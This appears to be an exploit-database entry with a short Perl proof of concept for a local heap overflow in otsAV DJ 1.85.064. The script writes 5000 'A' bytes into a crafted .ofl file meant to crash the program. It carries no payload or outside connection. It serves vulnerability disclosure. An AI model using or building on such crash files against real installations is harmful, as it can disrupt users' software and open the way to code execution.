otsAV DJ version 1.85.064 local heap overflow proof of concept exploit that creates a malicious .ofl file.
352206c36e2a191f261d855c9dec1710#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################
Comments
No comments yet, be the first!